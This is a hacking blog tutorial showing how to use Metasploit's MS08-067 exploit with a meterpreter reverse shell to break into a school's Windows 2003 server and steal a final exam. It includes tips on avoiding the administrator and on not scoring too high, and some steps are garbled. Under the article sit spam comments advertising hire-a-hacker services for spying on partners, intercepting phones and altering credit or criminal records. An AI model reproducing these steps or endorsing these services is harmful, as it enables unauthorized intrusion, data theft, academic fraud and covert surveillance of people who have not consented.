How to Hack Your School's or College's Server to Download Final Exam Answers
Welcome back, my fledgling hackers!
If you're like most aspiring hackers, at one time or another you've probably spent too much time playing #Call of Duty and not enough time preparing for your final exams.
So for today, we'll look at how to break into your school's server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!
This hack uses Metasploit along with its meterpreter, so let's get after those finals and fire up our Metasploit in BackTrack!
WARNING (Disclaimer):
Of course, this is for demonstration/entertainment purposes only. Please do not break into your school's server and steal exams as it's illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.
Step 1STEP-1
Find That Proper Exploit
Those of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.
In our case here, our school is running a Windows 2003 Server that stores all the department's exams and records. So, let's use the /exploit/windows/smb/ms08_067_netapi. To find it, type:
- msf > search ms08
Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:
- msf > use /exploit/windows/smb/ms08_067_netapi
STEP-2
Set the Payload
Now we need to set our payload. In this case, we'll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.
- msf > set payload /windows/meterpreter/reverse_tcp
Let's take a look next at the options that we need for this exploit/payload combination by typing:
- msf > show options
Meterpreter responds with the / symbol indicating that we're in the root directory.
Step 6
STEP-3
Set the Options
Now we can see that we need to set the RHOST and the LHOST.
- msf >set LHOST 192.168.1.114
- msf >set RHOST192.168.1.108
STEP-4
Exploit That Server!
Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.
- msf > exploit
STEP-5
Check to See if the Admin Is Using the System
We should now have a meterpreter shell on the school's server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.
- meterpreter >idletime
As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let's wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!
Once we're safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let's type lpwd (both pwd and lpwd will work).
STEP-6
Find the Final Exams
We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That's probably where the exams are! Let's change directories to Concord University:
- meterpreter c:\\ConcordUniversity
Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.
Now we're in ConcordUniversity, we can get a directory listing by typing:
- meterprter > ls
We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we're looking for the Biology final, let's navigate to the Biology directory.
- meterpreter > cd biology
Voilà ! There's the final exam for our biology class.
STEP-7
Download the Final
Meterpreter has a built-in download feature, so all we need to do is type:
- meterpreter > download C:\\biology\exams\FinalExam
We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.
When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!
Now we are guaranteed a 95% (don't get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to the Null Byte forum if you have questions on hacking topics unrelated to this article.
Commend it or contact me...E-Mail
Have you ever been curious of what your partner, kids or employees are up to? You can now intercept cell phones, boost credit scores and hack any website remotely. All you need to do is contact a verified hacker Helpline: +1 (347)-857-7580 Email: extremeinfiltrators@gmail.com
ReplyDelete
ReplyDeleteMy life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com